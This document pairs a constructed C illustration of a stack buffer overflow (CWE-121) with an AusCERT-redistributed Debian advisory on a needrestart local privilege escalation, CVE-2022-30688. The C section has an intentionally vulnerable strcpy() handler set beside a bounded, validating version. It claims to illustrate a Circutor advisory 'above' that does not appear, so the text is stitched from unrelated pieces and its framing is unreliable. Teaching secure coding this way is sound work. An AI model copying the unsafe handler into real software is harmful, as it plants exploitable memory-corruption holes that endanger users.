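As an added illustration of the CWE-121 pattern described in ICSA-22-137-01 above (not Circutor's code; the advisory does not publish the index.cgi source), here is a constructed C handler that copies a user-supplied "Address" value with strcpy() into a fixed stack buffer, beside a bounded version that rejects over-long or unexpected input instead of copying it. The buffer size, the function names and the IPv4/CIDR character policy are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* ADDR_MAX is an assumed size; the real index.cgi buffer is not public. */
#define ADDR_MAX 64

/* Vulnerable shape (CWE-121): the "Address" form value is copied into a
 * fixed stack buffer with strcpy() and no length check, so any value of
 * ADDR_MAX bytes or more writes past the buffer into the saved frame.
 * Kept only for contrast; call it with short, trusted input only. */
int set_firewall_address_unsafe(const char *address)
{
    char addr[ADDR_MAX];
    strcpy(addr, address);                  /* no bound: overflow here */
    return (int)strlen(addr);
}

/* Hardened shape: scan the input only up to the bound, reject anything
 * that does not fit (rejecting beats silent truncation, which strncpy()
 * would do while possibly dropping the NUL), then restrict the alphabet
 * to what a firewall address field needs (assumed here: IPv4 or CIDR).
 * Returns 0 on success and -1 on rejection; out is untouched on -1. */
int set_firewall_address_safe(const char *address, char *out, size_t out_len)
{
    size_t n = 0;
    if (address == NULL || out == NULL || out_len == 0)
        return -1;
    while (n < out_len && address[n] != '\0')
        n++;                                /* bounded length scan */
    if (n == 0 || n == out_len)
        return -1;                          /* empty, or no room for NUL */
    for (size_t i = 0; i < n; i++) {
        char c = address[i];
        if (!((c >= '0' && c <= '9') || c == '.' || c == '/'))
            return -1;                      /* unexpected character */
    }
    memcpy(out, address, n + 1);            /* includes terminating NUL */
    return 0;
}

int main(void)
{
    char dst[16];
    const char *ok = "192.168.1.10/24";          /* constructed input */
    const char *too_long = "192.168.100.100/24"; /* 18 bytes, does not fit */
    printf("%s -> %d\n", ok, set_firewall_address_safe(ok, dst, sizeof dst));
    printf("%s -> %d\n", too_long,
           set_firewall_address_safe(too_long, dst, sizeof dst));
    return 0;
}
```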
18 May 2022

ESB-2022.2436 - [Debian] needrestart: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2436
                        needrestart security update
                                 18 May 2022

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           needrestart
Publisher:         Debian
Operating System:  Debian GNU/Linux
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30688

Original Bulletin:
   https://lists.debian.org/debian-security-announce/2022/msg00105.html

Comment: CVSS (Max): None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-5137-1                   security@debian.org
https://www.debian.org/security/                       Salvatore Bonaccorso
May 17, 2022                          https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package        : needrestart
CVE ID         : CVE-2022-30688

Jakub Wilk discovered a local privilege escalation in needrestart, a utility
to check which daemons need to be restarted after library upgrades. Regular
expressions to detect the Perl, Python, and Ruby interpreters are not
anchored, allowing a local user to escalate privileges when needrestart tries
to detect if interpreters are using old source files.

For the oldstable distribution (buster), this problem has been fixed in
version 3.4-5+deb10u1.

For the stable distribution (bullseye), this problem has been fixed in
version 3.5-4+deb11u1.

We recommend that you upgrade your needrestart packages.

For the detailed security status of needrestart please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/needrestart

Further information about Debian Security Advisories, how to apply these
updates to your system and frequently asked questions can be found at:
https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

- --------------------------END INCLUDED TEXT--------------------